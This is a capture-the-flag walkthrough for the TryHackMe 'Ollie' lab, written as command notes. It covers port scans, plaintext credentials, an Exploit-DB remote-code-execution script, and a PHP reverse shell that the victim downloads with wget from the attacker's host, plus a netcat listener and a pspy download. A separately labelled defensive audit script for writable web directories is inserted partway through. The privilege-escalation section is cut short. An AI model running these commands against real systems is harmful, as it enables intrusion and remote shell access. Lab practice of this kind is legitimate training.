Ollie

Room Link: https://tryhackme.com/room/ollie

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/1337 - waste

Kali

nc -v $VICTIM 1337

TCP/80 - HTTP

Browser

Username: admin
Password: OllieUnixMontgomery!

Initial Shell

Exploit: https://www.exploit-db.com/raw/50963

Kali

python3 exploit.py  -usr admin -pwd OllieUnixMontgomery! -cmd 'whoami' -url http://$VICTIM

We can run commands from the browser as well.

Got this PHP reverse shell; just changed the IP.

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell
cd php-reverse-shell
subl php-reverse-shell.php 
python2 -m SimpleHTTPServer 81

Kali

nc -lvnp 1234

We have access to write to the immaolllieeboyyy directory so we put our shell there.

Browser

wget http://$KALI:81/php-reverse-shell.php -O immaolllieeboyyy/test.php

Browser

http://$VICTIM/immaolllieeboyyy/test.php
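
The upload step above depends on the web server account being able to write inside the web root. As an added example (not part of the original write-up), this defender-side shell audit lists the directories under a web root that a given account can write to and any PHP-type files already sitting in them; the function names and the www-data account in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up. Defender-side audit: which
# directories under a web root can an account write to, and which PHP-type
# files already sit in them?
# Assumptions: GNU stat/find; only classic mode bits are checked (no ACLs).

# writable_by USER PATH: succeed if owner/group/other bits let USER write PATH.
# USER may be a login name or a numeric uid.
writable_by() {
    wb_uid=$1
    case $wb_uid in *[!0-9]*) wb_uid=$(id -u "$1" 2>/dev/null) || return 2 ;; esac
    wb_meta=$(stat -c '%u %g %a' "$2" 2>/dev/null) || return 2
    wb_owner=${wb_meta%% *}
    wb_rest=${wb_meta#* }
    wb_group=${wb_rest%% *}
    wb_mode=$((0${wb_rest#* }))          # read the mode string as octal
    if [ "$wb_owner" = "$wb_uid" ]; then
        [ $((wb_mode & 0200)) -ne 0 ]; return   # owner: only owner bits apply
    fi
    case " $(id -G "$1" 2>/dev/null) " in
        *" $wb_group "*) [ $((wb_mode & 0020)) -ne 0 ]; return ;;
    esac
    [ $((wb_mode & 0002)) -ne 0 ]        # everyone else: world-write bit
}

# audit_webroot USER ROOT: print one finding per line.
audit_webroot() {
    find "$2" -type d 2>/dev/null | while IFS= read -r aw_dir; do
        writable_by "$1" "$aw_dir" || continue
        printf 'WRITABLE_DIR %s\n' "$aw_dir"
        find "$aw_dir" -maxdepth 1 -type f \
            \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \) 2>/dev/null |
            sed 's/^/SCRIPT_IN_WRITABLE_DIR /'
    done
}

# Usage (account name is an assumed default): ./audit.sh www-data /var/www/html
if [ "$#" -ge 2 ]; then audit_webroot "$1" "$2"; fi
```

Any SCRIPT_IN_WRITABLE_DIR line is worth reviewing, since a file written there by the web server account is served and executed on request.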

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cd /var/www/html
grep -ir "pass" config.php -A4 -B4

We can log in to MySQL but didn't find anything.

Victim

mysql -uphpipam_ollie -pIamDah1337estHackerDog!

Victim

su ollie
Password: OllieUnixMontgomery!

PSPY

Kali

wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 

Victim

cd /tmp/
wget http://10.10.231.159:81/pspy32 
chmod +x pspy32 
./pspy32
find / -name "feedme" 2>/dev/null 

Privilege Escalation

Kali

nc -lvnp 1338
